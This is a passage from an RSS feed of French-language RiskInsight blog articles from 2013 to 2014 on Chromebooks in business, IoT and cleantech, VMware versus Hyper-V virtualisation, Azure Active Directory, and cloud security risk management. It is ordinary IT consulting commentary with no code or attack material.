<p>La légèreté de l’OS permet aux constructeurs de proposer des appareils avec des configurations matérielles modestes et donc des prix très attractifs tant pour les Chromebook (ordinateurs portables) que pour les Chromebox (ordinateurs fixes, à la diffusion plus confidentielle).</p>
<p>Outre l’accès à des applications web, il est également possible d’utiliser des applications spécifiques sur  les Chromebook, les Chrome Apps. Celles-ci sont à base de technologies web mais avec l’apparence d&rsquo;une application classique. Elles permettent surtout un fonctionnement en mode déconnecté pour un usage hors ligne (c’est le cas de Gmail par exemple). Les Chrome Apps sont accessibles via le store applicatif Chrome Web Store, un peu à l&rsquo;image de Google Play pour Android.</p>
<h2><b>Des caractéristiques séduisantes pour les entreprises…</b></h2>
<p>Les Chromebook se caractérisent par leur facilité d’utilisation : démarrage et arrêt en quelques secondes, interface simple et intuitive, ajout d’applications via le Chrome Web Store, puissance et efficacité des outils Google parfaitement intégrés.</p>
<p>Les entreprises apprécieront également le peu d’opérations de maintenance nécessaires avec des mises à jour automatiques et fréquentes de l’OS et une gestion de la sécurité native (vérification au démarrage, navigateur sécurisé, données chiffrées…).</p>
<p>Google fournit également une console d’administration avec des fonctions minimales permettant de gérer une flotte de Chromebook : gestion des utilisateurs, de la configuration, des applications (applications préinstallées, liste blanche ou noire d’applications autorisées ou interdites), reporting.</p>
<p>Autant d’attributs qui rendent le Chromebook séduisant pour les entreprises.</p>
<h2><b>… mais une intégration compliquée avec l’existant de l’entreprise</b></h2>
<p>De nombreuses limites apparaissent en effet vite lors de l’utilisation d’un Chromebook en entreprise, la première concernant les applications.</p>
<p>Un Chromebook permet d’accéder aux applications au format web. Néanmoins, de nombreux sites intranet n’ont pas été conçus pour le navigateur Chrome mais pour Internet Explorer et pourraient nécessiter des adaptations. Les sites web utilisant des middlewares Java, Silverlight ou Flash ne sont également pas supportés.</p>
<p>Les applications Windows pour leur part ne fonctionnent pas sur un Chromebook. Certaines, encore peu nombreuses pour les applications professionnelles, sont disponibles au bon format dans le Chrome Web Store. Pour les autres, une solution  sera de se tourner vers des solutions de type publication d’applications ou de bureaux virtuels fournis par Citrix ou VMware, qui disposent de clients pour Chromebook. Ces clients (au format HTML 5) ne sont cependant pas encore aussi avancés que sur d’autres plateformes.</p>
<p>Les autres limites concernent l’intégration avec des services classiques d’infrastructure. Un Chromebook ne s’intègre pas dans un annuaire Active Directory et nécessite forcément un compte Google. Egalement gênant est la difficulté voire l’impossibilité d’utiliser des services aussi basiques que du partage de fichiers ou d’impression. Un utilisateur peut ainsi ajouter une imprimante mais cela nécessite d’utiliser les services Google Print mais également de disposer d’imprimantes « Cloud-Ready Printer, ce qui est rarement le cas en entreprise actuellement.</p>
<h2><b>Quel avenir dès lors pour les Chromebook en entreprise ?</b></h2>
<p>Le Chromebook représente une vraie rupture par rapport au modèle de PC classique sous Windows : plus simple, plus rapide, nécessitant peu de maintenance et peu coûteux, il reste cependant limité fonctionnellement et ne pourra rendre les mêmes services en entreprise. Est-ce à dire que c’est une voie sans issue ?</p>
<p>Pour des entreprises utilisant déjà les services Google comme Google Apps, la question de l’utilisation de Chromebook pour certains profils utilisateurs se doit d’être posée. Cette solution peut avoir un intérêt dans différents cas : utilisateurs mobiles travaillant principalement avec des outils collaboratifs, offre de type PC low cost avec un accès aux applications Windows via les solutions Citrix ou VMware, remplacement de clients légers, borne d’accès Intranet/Internet…</p>
<p>Pour les autres, Google continue à investir dans sa solution et à développer des partenariats pour améliorer sa plateforme : alliance avec Cisco pour disposer de Webex sur sa plateforme, travail avec Citrix et VMware pour améliorer l’accès aux applications Windows. L’engagement de constructeurs comme Lenovo ou HP est aussi à souligner.</p>
<p>Autant de signes positifs pour les Chromebook et leur développement en entreprise. À Google de se donner les moyens de percer pour de bon dans le monde de l’entreprise !</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/09/chromebook-pc-cloud-google-lassaut-entreprises/">Chromebook : le PC Cloud de Google à l’assaut des entreprises</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Les objets connectés, leviers clés des Cleantech</title>
		<link>https://www.riskinsight-wavestone.com/2014/08/les-objets-connectes-leviers-cles-cleantech/</link>
		
		<dc:creator><![CDATA[Aurelien Labrunye]]></dc:creator>
		<pubDate>Fri, 29 Aug 2014 06:46:42 +0000</pubDate>
				<category><![CDATA[Métiers - Digital & innovation]]></category>
		<category><![CDATA[cleantech]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[objets connectés]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=5704</guid>

					<description><![CDATA[<p>Lier les buzzwords « objets connectés » et « cleantech »  pourrait passer pour un gimmick de communicant afin d’attirer l’attention. Ils sont pourtant bel et bien liés, l’un (les objets connectés) étant un enabler majeur de l’autre (la cleantech). En effet, pour s’annoncer...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/08/les-objets-connectes-leviers-cles-cleantech/">Les objets connectés, leviers clés des Cleantech</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="text-align: left;" align="center"><span style="line-height: 1.5em;">Lier les </span><i style="line-height: 1.5em;">buzzwords</i><span style="line-height: 1.5em;"> « objets connectés » et « <a title="Wikipedia - Cleantech" href="http://fr.wikipedia.org/wiki/Cleantech" target="_blank">cleantech </a>»  pourrait passer pour un gimmick de communicant afin d’attirer l’attention. Ils sont pourtant bel et bien liés, l’un (les objets connectés) étant un </span><i style="line-height: 1.5em;">enabler </i><span style="line-height: 1.5em;">majeur de l’autre (la </span><i style="line-height: 1.5em;">cleantech</i><span style="line-height: 1.5em;">). En effet, pour s’annoncer « clean » ou œuvrant en faveur d’un monde économe et écologique, il faut bien pouvoir mesurer les impacts des projets déployés, ce à quoi s’attachent tous les composants de l’univers de l’internet des objets.</span></p>
<p>Cette association recouvre aussi une réalité industrielle, où les géants de l’informatique créent les conditions de marché favorables (standards, adoption des technologies, solutions globales) tandis qu’une multitude de startups essayent d’apporter des réponses créatives aux potentiels ainsi générés.</p>
<h2>De grands acteurs mobilisés pour un marché prometteur</h2>
<p>Les objets connectés ont dépassé le nombre d’humains depuis 2008 et atteignent d’ores et déjà plus de 50 milliards d’unités, qui produisent une masse de données doublant tous les 2 ans environ.</p>
<p>La première phase indispensable de l’Internet of Things, à savoir l’équipement en matériels (capteurs et connexions), est donc lancée. Dans les entreprises, il faudra l’accompagner d’une mise en place de processus et d’une conduite du changement  pour lier de manière utile hommes et données, pour transformer celles-ci en informations.</p>
<p>Chacun des acteurs du secteur tente de se positionner sur la chaîne de valeur qui se met progressivement en place et qui génerera selon Gartner plus de <a title="01net - L'internet des objets pèsera 1.900 milliards de dollars d'ici 2020" href="http://www.01net.com/editorial/605090/linternet-des-objets-pesera-1-900-milliards-de-dollars-dici-2020" target="_blank">1 900 milliards de $ d’ici 2020</a>.</p>
<h5><a href="http://www.solucominsight.fr/wp-content/uploads/2014/08/AACP.png"><img loading="lazy" decoding="async" class="aligncenter  wp-image-5707" src="http://www.solucominsight.fr/wp-content/uploads/2014/08/AACP.png" alt="AACP" width="689" height="83" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2014/08/AACP.png 984w, https://www.riskinsight-wavestone.com/wp-content/uploads/2014/08/AACP-437x52.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2014/08/AACP-71x9.png 71w" sizes="auto, (max-width: 689px) 100vw, 689px" /></a></h5>
<p>Deux initiatives concrètes conduites par GE (Industrial Internet) et Cisco (FOG) se positionnent sur ce marché.</p>
<p><a href="http://www.ge.com/stories/industrial-internet">Industrial Internet</a> est un consortium regroupant GE, AT&amp;T,Cisco et Intel visant à la digitalisation de tous les métiers de l’Industrie. GE se l’applique d’abord à elle-même avec par exemple une éolienne connectée permettant de mieux gérer la variabilité de fonctionnement inhérente à cette énergie et donc d’augmenter son efficacité de 25%. Mais elle propose aussi à tous la plateforme <a href="http://gigaom.com/2013/10/09/ge-teams-up-with-att-and-intel-to-conquer-the-industrial-internet-heres-its-plan/">Predix</a>, qui propose d’analyser les données collectées.</p>
<p>Le FOG computing est quant à lui une évolution du<a title="SolucomINSIGHT - dossier Cloud" href="http://www.solucominsight.fr/category/dossiers/cloud-computing/" target="_blank"> <i>Cloud</i></a> proposée par Cisco, où l’intelligence se veut mieux répartie, près des sources de données, afin d’améliorer la QoS et accélérer le traitement. L’apport de ce positionnement qui multiplie les équipements devrait être surtout palpable pour des besoins temps réel, où être en bordure du Cloud, voire en local, sera nécessaire.</p>
<h2>Un foisonnement de startups à fort potentiel</h2>
<p>Cette concrétisation à grande échelle est basée sur des composants miniaturisés qui communiquent entre eux (convergence vers le Bluetooth) et qui sont de plus en plus économes. Il reste néanmoins de grands progrès de standards à faire (matériel, logiciel, transmission) et des cas d’usages à affiner.</p>
<p>La question de l’énergie est particulièrement ciblée, que ce soit au niveau de la production ou de la consommation. La tendance cleantech, qui regroupe obligations légales, besoins marketing et conscience écologique, aiguillonne en effet des acteurs en recherche d’économies et d’optimisation. On pourra par exemple citer quelques quelques jeunes pousses françaises qui se sont lancé sur ce marché à trois dimensions : ville,  bâtiments et  utilisateurs.</p>
<ul>
<li><b>Pour la ville : AgoraEnergy</b> cherche à convaincre les mairies d’introduire des capteurs de remplissage pour les citernes de gaz et les bennes de déchets, ce qui permet d’optimiser les tournées. De son côté, <b>Incitât</b> met en place la facturation individuelle des déchets via des poubelles intelligentes, ce qui améliore les taux de tri par une incitation économique. Dans un autre domaine, <b>G2 Mobility</b> déploie des bornes de recharge pour véhicules électriques pilotées à distance.</li>
<li><b>Pour les bâtiments : Avob</b>, <b>Ubiant</b> ou <b>Intent</b> démarchent les constructeurs et gestionnaires de bâtiments avec un packagesystème d’exploitation, applications, box et capteurs permettant de mettre en place un réseau de suivi de consommation d’énergie et d’interagir avec les appareils.<b> </b></li>
<li><b>Pour les utilisateurs : Alfileo </b>propose des éléments similaires mais avec un focus sur les clients industriels d’énergie consommateurs de froid tandis que <b>WattGo</b> se positionne sur les particuliers avec box et algorithmes pour permettre de déstructurer la courbe de consommation.</li>
</ul>
<p>&nbsp;</p>
<p>La diversité et l’ampleur des exemples cités illustrent un écosystème Cleantech tangible avec un potentiel qui se concrétise grâce au déploiement d’objets connectés. Les premières alliances, investissements et retours d’expérience enrichissent la vision business des objets connectés. Cet axe pionnier et prometteur d’efficacité écologique doit inviter les entreprises susceptibles d’être impactées par la généralisation des objets connectés (c’est-à-dire toutes !) à réfléchir dès à présent au rôle que ceux-ci peuvent jouer dans leurs métiers.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/08/les-objets-connectes-leviers-cles-cleantech/">Les objets connectés, leviers clés des Cleantech</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Virtualisation : une hyper compétition entre VMware et Microsoft</title>
		<link>https://www.riskinsight-wavestone.com/2014/06/virtualisation-hyper-competition-vmware-microsoft/</link>
		
		<dc:creator><![CDATA[Maximilien Moulin]]></dc:creator>
		<pubDate>Wed, 11 Jun 2014 17:02:46 +0000</pubDate>
				<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[Métiers - Stratégie d’entreprise]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[VMware]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=5494</guid>

					<description><![CDATA[<p>La virtualisation est désormais incontournable et couvre en moyenne 70% du parc des entreprises. Alors que VMware est le leader incontesté, Microsoft  arrive chez les grands comptes en challengeur, avec une politique commerciale agressive. Microsoft est-il vraiment capable de mettre...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/06/virtualisation-hyper-competition-vmware-microsoft/">Virtualisation : une hyper compétition entre VMware et Microsoft</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><i>La virtualisation est désormais incontournable et couvre en moyenne 70% du parc des entreprises. Alors que VMware est le leader incontesté, Microsoft  arrive chez les grands comptes en challengeur, avec une politique commerciale agressive. </i></p>
<p><i>Microsoft est-il vraiment capable de mettre en difficulté VMware ? Faut-il migrer vers Hyper-V ? Adopter une stratégie « multi-sourcing » ? Autant de questions que se pose le marché et auxquelles nous avons tenté de répondre.</i></p>
<p><b>Microsoft, un sérieux <em>challenger</em> de VMware</b><b></b></p>
<p>Depuis l’avènement de la virtualisation x86, VMware est le leader incontesté du marché. La majorité des grandes entreprises utilisent sa solution vSphere et en sont satisfaites.</p>
<p>Cependant, comme toute situation de quasi-monopole, cette domination du marché entraîne des préoccupations. Les produits VMware sont chers et la politique commerciale peut évoluer rapidement (la mise en place d’une facturation à la mémoire vive utilisée, abandonnée par VMware par la suite, avait suscité un tollé auprès de ses clients).  De plus la réversibilité est complexe et coûteuse.</p>
<p>De son côté, Microsoft a décidé d’accélérer sa pénétration du marché en intégrant le produit Hyper-V dans Windows Server depuis la version 2008. Jusqu’ici en retard techniquement, Hyper-V s’est amélioré à chaque itération jusqu’à devenir, avec Windows Server 2012 R2 et la suite System Center, un sérieux challengeur de VMware.</p>
<p>Aujourd’hui, la course entre VMware et Microsoft ne se concentre plus sur les caractéristiques techniques maximales ou sur les fonctionnalités. En effet, bien que différentes, les deux solutions répondent à la très grande majorité des besoins (qui a besoin d’une machine virtuelle avec plus de 64 vCPU ?).</p>
<p>Alors comment choisir ? En pratique, VMware reste encore en avance au niveau de l’exploitabilité  et dispose d’un plus grand écosystème de composants compatibles, alors qu’Hyper-V est généralement plus compétitif financièrement.</p>
<p>Au-delà de ces points (qui sont à relativiser selon le contexte de chaque client et les accords éditeurs), ce sont la vision et les trajectoires des deux géants qui doivent être pris en considération.</p>
<p><b>Deux trajectoires différentes, mais une vision <i>Cloud</i> commune</b></p>
<p>Les deux constructeurs partagent en effet une vision du <i>Cloud</i> similaire, basée sur le pilotage unifié de ressources internes au sein d’un Cloud privé et externes au sein de leur <i>Cloud</i> public ou de celui d’un partenaire. En revanche leurs trajectoires sont différentes et liées à l’historique.</p>
<p>Ainsi VMware, fort sur la virtualisation <i>on-premise</i>, a développé une offre de <i>Cloud</i> privé complète et résiliente avant de développer des services de <i>Cloud</i> public (vCHS) et une interconnexion avec un réseau de partenaires (Amazon, OVH, et plus généralement tout fournisseur proposant un connecteur vCloud).</p>
<p>De son côté Microsoft a eu une approche inverse. Il est parti de son <i>Cloud</i> public Azure, lancé bien plus tôt, et a développé dans un second temps son offre de <i>Cloud</i> privé basée sur Hyper-V (avec la suite System Center et Azure pack) en intégrant progressivement les fonctionnalités développées pour Azure.</p>
<p>Qu’en conclure ? Nos deux géants ont une vision fondamentalement différente dans la conception des architectures du <i>Cloud</i> public ! Quand Microsoft adopte une approche où l’application doit intégrer la haute-disponibilité au sein de son architecture (concept dit du <i>design for failure</i>), VMware part au contraire du principe que c’est à l’infrastructure d’offrir des services résilients.</p>
<p><b>Qu’aller chercher avec Hyper-V ?</b></p>
<p>Le principal intérêt reste financier : Hyper-V est compétitif. Pour une entreprise ayant un important parc <i>Windows Server</i>, les licences nécessaires sont souvent déjà acquises par l’entreprise (licences <i>Windows Server Datacenter</i> et <i>System center</i>). Le levier d’économie est alors substantiel.<b></b></p>
<p>Un autre intérêt est la mise en place d’une stratégie de <i>Dual Sourcing</i>, en ayant une ligne de service Hyper-V et une ligne de service VMware. Ainsi, l’entreprise peut rester indépendante des fournisseurs tout en ayant de plus gros leviers de négociation.</p>
<p>En revanche, il ne faut pas sous-estimer la complexité et le coût d’un projet de migration d’une partie d’un parc. Une approche « Big Bang » est trop risquée et nous conseillons plutôt d’adopter une approche progressive.</p>
<p>Comment ? En commençant par expérimenter Hyper-V en démarrant un pilote sur un périmètre limité et non critique (par exemple quelques environnements de test / staging). Ce pilote permettra de vérifier l’exploitabilité de la plateforme et d’acquérir les compétences en interne. Une généralisation pourra être envisagée par la suite sur une filière complète (environnements de développements et de tests par exemple), selon  les résultats et les opportunités.</p>
<p>Si vous souhaitez aller plus loin en matière de « <i>dual sourcing</i> » et simplifier l’architecture globale, il est préférable de piloter les infrastructures Hyper-V et VMware avec la même solution. Microsoft (avec SCVMM), VMware (avec vCAC) ou des tiers (comme HP avec HP OO) proposent des outils, permettant alors de tirer bénéfice des deux plateformes, tout en simplifiant l’exploitation.</p>
<p>Et la cerise sur le gâteau ? Opter pour ces outils permettront à l’entreprise de se préparer à une approche <a href="http://www.solucominsight.fr/2013/09/quelles-vertus-au-cloud-hybride/">Cloud Hybride</a> !</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/06/virtualisation-hyper-competition-vmware-microsoft/">Virtualisation : une hyper compétition entre VMware et Microsoft</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Identité dans le cloud : le marché se structure, quid de l’approche de Microsoft ?</title>
		<link>https://www.riskinsight-wavestone.com/2014/02/identite-dans-le-cloud-le-marche-se-structure-quid-de-lapproche-de-microsoft/</link>
		
		<dc:creator><![CDATA[Hamza KHARBACHI]]></dc:creator>
		<pubDate>Wed, 05 Feb 2014 07:12:55 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Digital Identity]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[IAM]]></category>
		<category><![CDATA[identity & access governance]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=5000</guid>

					<description><![CDATA[<p>Héberger ses applications dans le cloud ou recourir à des applications cloud en mode SaaS est devenu une pratique courante pour les DSI et les directions métier. De là est né un nouveau besoin, celui de l’Identity and Access Management...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/02/identite-dans-le-cloud-le-marche-se-structure-quid-de-lapproche-de-microsoft/">Identité dans le cloud : le marché se structure, quid de l’approche de Microsoft ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Héberger ses applications dans le cloud ou recourir à des applications cloud en mode SaaS est devenu une pratique courante pour les DSI et les directions métier. De là est né un nouveau besoin, celui de l’Identity and Access Management pour le cloud. Plusieurs acteurs, se sont d’ores et déjà positionnés sur ce marché, certains venant du monde traditionnel de l’IAM (Ping Identity, CA, SailPoint…), d’autres étant des pure players du cloud tels qu’Okta ou OneLogin.</em></p>
<p><em>Microsoft fait partie de ces acteurs de l’IAM pour le cloud. En raison de son rôle déterminant dans le SI « On-Premises » des entreprises, nous allons nous pencher de plus près sur sa solution : Windows Azure Active Directory (WAAD).</em></p>
<h2>WAAD : une solution IAM-as-a-Service pour le <em>cloud</em></h2>
<p>Contrairement à ce que pourrait indiquer son nom, la solution Windows Azure Active Directory n’est pas un Active Directory hébergé dans Azure, la plate-forme <em>cloud</em> de Microsoft.</p>
<p>Officiellement lancée le 8 avril 2013, WAAD est décrit par Microsoft comme « <em>une solution complète et sécurisée pour la gestion des identités et des accès dans le cloud. Elle combine des services d&rsquo;annuaires principaux, une gouvernance des identités avancée, une gestion et une sécurisation des accès aux applications </em>».</p>
<p>Microsoft propose donc WAAD comme solution d’IAM-as-a-Service permettant, entre autres, de couvrir les applications hébergées dans le <em>cloud</em>. Contrairement à son approche « brique à brique » traditionnelle pour les services IAM <em>On-Premises, </em>dans laquelle chaque service est fourni par un produit spécifique, Microsoft adopte là une approche plus globale comme le démontre le tableau suivant :</p>
<p><figure id="attachment_5001" aria-describedby="caption-attachment-5001" style="width: 404px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="size-medium wp-image-5001" title="Comparaison des offres On-Premises Vs cloud de Microsoft" src="http://www.solucominsight.fr/wp-content/uploads/2014/02/tableau-Waad-404x191.jpg" alt="" width="404" height="191" /><figcaption id="caption-attachment-5001" class="wp-caption-text">Comparaison des offres On-Premises Vs cloud de Microsoft</figcaption></figure></p>
<p>Windows Azure Active Directory permet ainsi aux entreprises de :</p>
<ul>
<li>Étendre au <em>cloud</em> les identités gérées localement au sein d’un Active Directory <em>On-Premises</em> ;</li>
<li>Gérer les identités et accès depuis le <em>cloud,</em> à la fois pour les applications <em>cloud</em> de Microsoft (Office 365, Dynamics CRM Online, Windows Intune), pour un nombre important d’applications SaaS du marché, mais également pour toute application que l’entreprise raccorde à WAAD ;</li>
<li>Apporter une connexion unique (SSO) aux applications hébergées dans le <em>cloud, </em>voire aussi, dans certains cas, aux applications <em>On-Premises ;</em></li>
<li>Protéger les applications les plus critiques avec une solution d’authentification forte.</li>
</ul>
<p>Notons que certains services proposés sont antérieurs à la date de lancement officielle puisqu’ils ont été introduits dès 2010 pour offrir les fonctionnalités de gestions des identités et des accès à Office 365. C’est ainsi que Microsoft a pu afficher les chiffres de 265 milliards d’authentifications réalisées et de 2,9 millions d’organisations clientes à la date de lancement de la solution.</p>
<h2>Comment mettre en œuvre WAAD ?</h2>
<p>Deux modes d’implémentation sont envisageables en fonction des usages que l’entreprise souhaite couvrir.</p>
<p>La première possibilité est<strong> une implémentation en <em>stand alone</em></strong>, sans aucun lien avec les annuaires ou briques d’identités présentes dans le SI de l’entreprise. Cette absence de lien avec les infrastructures de l’entreprise permet de bénéficier rapidement d’une solution IAM pour le <em>cloud. </em>Néanmoins, cela impose de gérer spécifiquement le cycle de vie des identités (créations, modifications, suppressions), des mots de passe (initialisations, réinitialisations) et des habilitations (affectations de groupes).</p>
<p>La seconde possibilité consiste à <strong>« étendre les identités locales vers le <em>cloud ». </em></strong>Ce type d’implémentation permet de déployer simplement des applications <em>cloud</em> et ce de façon transparente pour les utilisateurs. Pour cela, une synchronisation unidirectionnelle entre un Active Directory géré localement et WAAD est mise en place (via l’outil DirSync). Dès lors, les processus de gestion du cycle de vie des identités déjà en place au sein de l’entreprise se retrouvent étendus au <em>cloud.</em></p>
<p>Et afin de permettre un accès sans couture aux utilisateurs à la fois aux applications cloud et aux applications hébergées dans le SI de l&rsquo;entreprise, il est nécessaire de disposer d&rsquo;une infrastructure de fédération des identités <em>On-Premises</em>.</p>
<p>Par ailleurs, il est possible d’utiliser un module d’authentification forte. Un téléphone est alors indispensable quel que soit le mode d’authentification choisi : One-Time Password par <em>SMS</em>, OTP par appel téléphonique ou encore notifications sur <em>smartphone</em>. Notons que ces fonctionnalités reposent sur la solution de l’éditeur PhoneFactor, racheté par Microsoft en octobre 2012.</p>
<p>Rappelons que Windows Azure Active Directory reste une solution d’IAM pour le cloud parmi d’autres. Dans un marché où des mouvements sont à prévoir dans les mois qui viennent, on peut se demander quels sont les véritables bénéfices de ces solutions, et ce qui les distingue les unes des autres. Des questions qui seront abordées dans un prochain article…</p>
<p>&nbsp;</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2014/02/identite-dans-le-cloud-le-marche-se-structure-quid-de-lapproche-de-microsoft/">Identité dans le cloud : le marché se structure, quid de l’approche de Microsoft ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Sécurité et Cloud, un mariage de raison</title>
		<link>https://www.riskinsight-wavestone.com/2013/12/securite-et-cloud-un-mariage-de-raison/</link>
		
		<dc:creator><![CDATA[Gérôme Billois]]></dc:creator>
		<pubDate>Sun, 15 Dec 2013 20:12:45 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[ANSSI]]></category>
		<category><![CDATA[chiffrement]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[confidentialité des données]]></category>
		<category><![CDATA[conformité]]></category>
		<category><![CDATA[ENISA]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=4748</guid>

					<description><![CDATA[<p>Lorsque l&#8217;on parle de cloud computing, les questions de sécurité s&#8217;invitent rapidement dans la conversation. Mes services seront-ils disponibles ? Où et comment vont être stockées mes données ? Avec quel niveau de contrôle ? Les risques mis en avant...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/12/securite-et-cloud-un-mariage-de-raison/">Sécurité et Cloud, un mariage de raison</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Lorsque l&rsquo;on parle de cloud computing, les questions de sécurité s&rsquo;invitent rapidement dans la conversation. Mes services seront-ils disponibles ? Où et comment vont être stockées mes données ? Avec quel niveau de contrôle ? Les risques mis en avant sont cependant à remettre en perspective.</p>
<h2>Des craintes à relativiser<em> &#8230;<br />
</em></h2>
<h4>Disponibilité du <em>Cloud</em></h4>
<p>Chaque incident touchant l’un des grands acteurs du <em>Cloud</em> fait la « Une » de l’actualité, mettant sur le devant de la scène la question de sa disponibilité.</p>
<p>Il s’agit pourtant d’un faux problème : les taux de disponibilité des services <em>Cloud</em> sont souvent  supérieurs à ceux des systèmes internes des entreprises. La situation, d’un point de vue médiatique, est comparable à celle des accidents aériens : bien que rares, ils choquent l’opinion et intéressent les journalistes beaucoup plus que les accidents de voiture, qui font pourtant annuellement plus de victimes. La disponibilité n’est donc pas un risque inhérent au <em>Cloud</em>. Il reste néanmoins une spécificité à laquelle il faut prêter attention : la connectivité avec le fournisseur Cloud. Si celui-ci utilise internet comme unique moyen d’accès à ses datacenters, le risque d’indisponibilité de cet accès et d’internet en tant que tel doit être pris en compte.</p>
<h4><em> </em>Confidentialité des données</h4>
<p>Mes données sont-elles isolées de celles des autres clients ? Les administrateurs peuvent-ils y accéder ? Il est important de remettre ces craintes en perspective. D’une part, toutes les données de l’entreprise ne sont pas critiques en termes de confidentialité. D’autre part, si ces questions se justifient dans certains cas, elles ne sont pas nouvelles et ont trouvé leurs réponses il y a déjà plusieurs années, à l’heure des premiers contrats d’externalisation IT ou de l’emploi d’administrateurs prestataires. Les principales différences résident dans l’éloignement potentiel et le degré de contrôle possible du fournisseur.</p>
<p>La confidentialité des données vis-à-vis des Etats reste un sujet plus complexe à adresser. Ces derniers disposent en effet de textes leur permettant d’accéder aux données présentes dans les systèmes hébergés sur leur sol. Les USA font souvent figure d’épouvantail, leurs textes ayant en plus une portée extraterritoriale (Patriot Act, FISAA). Ces textes permettent à la justice et aux forces de l’ordre américaines d’accéder aux données manipulées par des sociétés de droit américain quel que soit le client et la localisation des données. Le risque est donc que des Etats aient accès aux données dans un objectif d’espionnage économique. Ce risque est réel comme l’illustrent les révélations sur les moyens dont dispose la NSA. Mais là encore, la portée du risque est à mesurer. Seules quelques données ont un niveau de sensibilité élevé : étatiques (administrations, défense, etc.), stratégiques pour l’entreprise dans un environnement à forts enjeux concurrentiels, géopolitiques, etc.</p>
<h4><strong> </strong>Conformité réglementaire</h4>
<p>La conformité réglementaire (PCI-DSS, LIL…) des offres <em>Cloud</em>, notamment en matière de protection des données à caractère personnel est également un sujet d’inquiétude. La situation reste très variable en fonction des acteurs, même si des réponses techniques (localisation des données, chiffrement…) ou juridiques (Safe Harbour, contrat type de la commission européenne…) existent aujourd’hui chez la plupart d’entre eux.</p>
<h2>… car la sécurité est au cœur de la préoccupation des fournisseurs</h2>
<p>Très visibles et régulièrement attaqués, les fournisseurs majeurs de <em>Cloud</em> mettent souvent en place des équipes dédiées pour assurer la sécurité de leurs services. La sécurité est même devenue pour certains d’entre eux l’un  des principaux arguments de vente.</p>
<p>Attention cependant : tous n’assurent pas le même niveau de sécurité. Il reste donc important de préciser avec le fournisseur les mesures incluses dès la signature du contrat, d’autant qu’il est difficile de faire évoluer les mécanismes de sécurité d’un fournisseur quand ceux-ci ne sont pas prévus initialement. Certains fournisseurs de solutions « SaaS métier » de taille petite et intermédiaire négligent parfois la sécurité : les audits et tests d’intrusion ont pour ce type d’offres une importance accrue.</p>
<h2>Vers une coresponsabilité fournisseur / entreprise</h2>
<h4>Analyse de risque : passer de l’intention à l’action</h4>
<p>Suivre une démarche d’analyse de risque est impératif pour lever les freins relatifs à l’adoption du <em>Cloud</em>. La finalité de l’analyse n’est pas d’interdire le <em>Cloud</em> par défaut mais plutôt d’identifier les données sensibles afin d’accompagner les projets de la manière la plus sûre et la plus pertinente. L’implication des responsables sécurité dès le démarrage des projets est donc essentielle. Ils doivent identifier les risques que l’on peut réduire par des moyens techniques et organisationnels, et ceux résiduels impossibles à couvrir. Aux Métiers et à la Direction de décider ensuite si ceux-ci sont acceptables ou non pour l’entreprise. Et de revoir si besoin le périmètre de la démarche <em>Cloud</em>.</p>
<h4>Des contrôles à ne pas négliger…</h4>
<p>Durant le projet ou en amont lors de la phase de choix des fournisseurs, il est recommandé de poser des questions précises sur les mesures de sécurité pour ne pas laisser place à des réponses ambiguës. Par exemple, beaucoup de fournisseurs mettent en avant leurs certifications.</p>
<p>Il convient de vérifier le type de certification et le périmètre concerné. Un certain nombre d’acteurs du <em>Cloud</em> acceptent d’ailleurs de fournir des détails sur l’architecture de leur solution, après signature d’un accord de non-divulgation. La capacité à répondre rapidement et de manière détaillée aux questions permet de se forger un avis sur la maturité de l’offre proposée.</p>
<p>En outre, la possibilité d’auditer le prestataire <em>Cloud</em> est un bonus à ne pas négliger. Accepter un audit est une preuve de transparence du fournisseur et de confiance en son niveau de sécurité. Même si les plus grands acteurs anglo-saxons s’y refusent, il est toujours utile de poser la question, notamment pour des acteurs de taille intermédiaire.</p>
<h4>Des référentiels émergents</h4>
